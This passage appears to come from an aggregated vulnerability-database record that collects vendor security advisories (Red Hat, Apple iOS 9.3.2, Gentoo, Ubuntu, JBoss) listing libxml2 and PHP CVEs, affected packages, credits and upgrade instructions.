6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\ni386:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-python-2.7.6-21.el6_8.1.i686.rpm\n\nppc64:\nlibxml2-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.ppc64.rpm\n\ns390x:\nlibxml2-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-python-2.7.6-21.el6_8.1.s390x.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-static-2.7.6-21.el6_8.1.i686.rpm\n\nppc64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.ppc64.rpm\n\ns390x:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-static-2.7.6-21.el6_8.1.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\ni386:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-python-2.7.6-21.el6_8.1.i686.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-static-2.7.6-21.el6_8.1.i686.rpm\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-python-2.9.1-6.el7_2.3.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-static-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-static-2.9.1-6.el7_2.3.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-1762\nhttps://access.redhat.com/security/cve/CVE-2016-1833\nhttps://access.redhat.com/security/cve/CVE-2016-1834\nhttps://access.redhat.com/security/cve/CVE-2016-1835\nhttps://access.redhat.com/security/cve/CVE-2016-1836\nhttps://access.redhat.com/security/cve/CVE-2016-1837\nhttps://access.redhat.com/security/cve/CVE-2016-1838\nhttps://access.redhat.com/security/cve/CVE-2016-1839\nhttps://access.redhat.com/security/cve/CVE-2016-1840\nhttps://access.redhat.com/security/cve/CVE-2016-3627\nhttps://access.redhat.com/security/cve/CVE-2016-3705\nhttps://access.redhat.com/security/cve/CVE-2016-4447\nhttps://access.redhat.com/security/cve/CVE-2016-4448\nhttps://access.redhat.com/security/cve/CVE-2016-4449\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXa8B8XlSAg2UNWIIRAh9ZAJ99xgPhOaIopIxmynm+vlDcmw4jFACeLvTm\nZsVLEgJAF0Zt6xZVzqvVW7U=\n=fREV\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-05-16-2 iOS 9.3.2\n\niOS 9.3.2 is now available and addresses the following:\n\nAccessibility\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to determine kernel memory layout\nDescription: A buffer overflow was addressed through improved size\nvalidation. \nCVE-ID\nCVE-2016-1790 : Rapelly Akhil\n\nCFNetwork Proxies\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker in a privileged network position may be able to\nleak sensitive user information\nDescription: An information leak existed in the handling of HTTP and\nHTTPS requests. This issue was addressed through improved URL\nhandling. \nCVE-ID\nCVE-2016-1801 : Alex Chapman and Paul Stone of Context Information\nSecurity\n\nCommonCrypto\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to leak sensitive user\ninformation\nDescription: An issue existed in the handling of return values in\nCCCrypt. This issue was addressed through improved key length\nmanagement. \nCVE-ID\nCVE-2016-1802 : Klaus Rodewig\n\nCoreCapture\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1803 : Ian Beer of Google Project Zero, daybreaker working\nwith Trend Micro\u2019s Zero Day Initiative\n\nDisk Images\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local attacker may be able to read kernel memory\nDescription: A race condition was addressed through improved\nlocking. \nCVE-ID\nCVE-2016-1807 : Ian Beer of Google Project Zero\n\nDisk Images\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndisk images. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2016-1808 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of\nTrend Micro\n\nImageIO\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted image may lead to a denial\nof service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1811 : Lander Brandt (@landaire)\n\nIOAcceleratorFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1817 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative\nCVE-2016-1818 : Juwei Lin of TrendMicro\nCVE-2016-1819 : Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved locking. \nCVE-ID\nCVE-2016-1814 : Juwei Lin of TrendMicro\n\nIOAcceleratorFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1813 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1823 : Ian Beer of Google Project Zero\nCVE-2016-1824 : Marco Grassi (@marcograss) of KeenLab (@keen_lab),\nTencent\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1827 : Brandon Azad\nCVE-2016-1828 : Brandon Azad\nCVE-2016-1829 : CESG\nCVE-2016-1830 : Brandon Azad\nCVE-2016-1831 : Brandon Azad\n\nlibc\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1832 : Karl Williamson\n\nlibxml2\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted XML may lead to an unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1833 : Mateusz Jurczyk\nCVE-2016-1834 : Apple\nCVE-2016-1835 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-1837 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-1838 : Mateusz Jurczyk\nCVE-2016-1839 : Mateusz Jurczyk\nCVE-2016-1840 : Kostya Serebryany\n\nlibxslt\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1841 : Sebastian Apelt\n\nMapKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker in a privileged network position may be able to\nleak sensitive user information\nDescription: Shared links were sent with HTTP rather than HTTPS. \nThis was addressed by enabling HTTPS for shared links. \nCVE-ID\nCVE-2016-1842 : Richard Shupak (https://www.linkedin.com/in/rshupak)\n\nOpenGL\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks\n\nSafari\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A user may be unable to fully delete browsing history\nDescription: \"Clear History and Website Data\" did not clear the\nhistory. The issue was addressed through improved data deletion. \nCVE-ID\nCVE-2016-1849 : Adham Ghrayeb\n\nSiri\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A person with physical access to an iOS device may be able\nto use Siri to access contacts and photos from the the lock screen\nDescription: A state management issue existed when accessing Siri\nresults on the lock screen. This issue was addressed by disabling\ndata detectors in Twitter results when the device is locked. \nCVE-ID\nCVE-2016-1852 : videosdebarraquito\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may disclose data from another\nwebsite\nDescription: An insufficient taint tracking issue in the parsing of\nsvg images was addressed through improved taint tracking. \nCVE-ID\nCVE-2016-1858 : an anonymous researcher\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1854 : Anonymous working with Trend Micro\u0027s Zero Day\nInitiative\nCVE-2016-1855 : Tongbo Luo and Bo Qu of Palo Alto Networks\nCVE-2016-1856 : lokihardt working with Trend Micro\u0027s Zero Day\nInitiative\nCVE-2016-1857 : Jeonghoon Shin@A.D.D, Liang Chen, Zhen Feng, wushi of\nKeenLab, Tencent working with Trend Micro\u0027s Zero Day Initiative\n\nWebKit Canvas\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1859 : Liang Chen, wushi of KeenLab, Tencent working with\nTrend Micro\u0027s Zero Day Initiative\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update\nwill be \"9.3.2\". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201701-37\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libxml2: Multiple vulnerabilities\n Date: January 16, 2017\n Bugs: #564776, #566374, #572878, #573820, #577998, #582538,\n #582540, #583888, #589816, #597112, #597114, #597116\n ID: 201701-37\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in libxml2, the worst of which\ncould lead to the execution of arbitrary code. \n\nBackground\n==========\n\nlibxml2 is the XML (eXtended Markup Language) C parser and toolkit\ninitially developed for the Gnome project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/libxml2 \u003c 2.9.4-r1 \u003e= 2.9.4-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libxml2. Please review\nthe CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.9.4-r1\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-1819\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819\n[ 2 ] CVE-2015-5312\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312\n[ 3 ] CVE-2015-7497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497\n[ 4 ] CVE-2015-7498\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498\n[ 5 ] CVE-2015-7499\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499\n[ 6 ] CVE-2015-7500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500\n[ 7 ] CVE-2015-7941\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941\n[ 8 ] CVE-2015-7942\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942\n[ 9 ] CVE-2015-8035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035\n[ 10 ] CVE-2015-8242\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242\n[ 11 ] CVE-2015-8806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806\n[ 12 ] CVE-2016-1836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836\n[ 13 ] CVE-2016-1838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838\n[ 14 ] CVE-2016-1839\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839\n[ 15 ] CVE-2016-1840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840\n[ 16 ] CVE-2016-2073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073\n[ 17 ] CVE-2016-3627\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627\n[ 18 ] CVE-2016-3705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705\n[ 19 ] CVE-2016-4483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483\n[ 20 ] CVE-2016-4658\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658\n[ 21 ] CVE-2016-5131\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201701-37\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. From: Marc Deslauriers \u003cmarc.deslauriers@canonical.com\u003e\nReply-To: Ubuntu Security \u003csecurity@ubuntu.com\u003e\nTo: ubuntu-security-announce@lists.ubuntu.com\nMessage-ID: \u003c5755B7E3.5040103@canonical.com\u003e\nSubject: [USN-2994-1] libxml2 vulnerabilities\n\n\n\n\n============================================================================\nUbuntu Security Notice USN-2994-1\nJune 06, 2016\n\nlibxml2 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 15.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in libxml2. (CVE-2015-8806, CVE-2016-2073,\nCVE-2016-3627, CVE-2016-3705, CVE-2016-4447)\n\nIt was discovered that libxml2 incorrectly handled certain malformed\ndocuments. \n(CVE-2016-1762, CVE-2016-1834)\n\nMateusz Jurczyk discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-1833, CVE-2016-1838, CVE-2016-1839)\n\nWei Lei and Liu Yang discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-1835, CVE-2016-1837)\n\nWei Lei and Liu Yang discovered that libxml2 incorrectly handled certain\nmalformed documents. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 15.10 and\nUbuntu 16.04 LTS. (CVE-2016-1836)\n\nKostya Serebryany discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-1840)\n\nIt was discovered that libxml2 would load certain XML external entities. (CVE-2016-4449)\n\nGustavo Grieco discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-4483)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libxml2 2.9.3+dfsg1-1ubuntu0.1\n\nUbuntu 15.10:\n libxml2 2.9.2+zdfsg1-4ubuntu0.4\n\nUbuntu 14.04 LTS:\n libxml2 2.9.1+dfsg1-3ubuntu4.8\n\nUbuntu 12.04 LTS:\n libxml2 2.7.8.dfsg-5.1ubuntu4.15\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u2. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. \n\nSecurity Fix(es):\n\n* This update fixes several flaws in OpenSSL. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team)\nas the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),\nHanno BAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,\nCVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj\nSomorovsky as the original reporter of CVE-2016-2107; Yuval Yarom\n(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv\nUniversity), and Nadia Heninger (University of Pennsylvania) as the\noriginal reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as\nthe original reporter of CVE-2016-0705. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6",
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VAR-201506-0464
Vulnerability from variot - Updated: 2026-04-10 22:57Multiple stack-based buffer overflows in the phar_set_inode function in phar_internal.h in PHP before 5.4.40, 5.5.x before 5.5.24, and 5.6.x before 5.6.8 allow remote attackers to execute arbitrary code via a crafted length value in a (1) tar, (2) phar, or (3) ZIP archive. PHP is prone to a buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. The following versions are affected: PHP prior to 5.4.40, 5.5.x prior to 5.5.24, and 5.6.x prior to 5.6.8. ========================================================================== Ubuntu Security Notice USN-2572-1 April 20, 2015
php5 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in PHP. This issue only applied to Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-2348)
It was discovered that PHP incorrectly handled unserializing PHAR files. (CVE-2015-2787)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
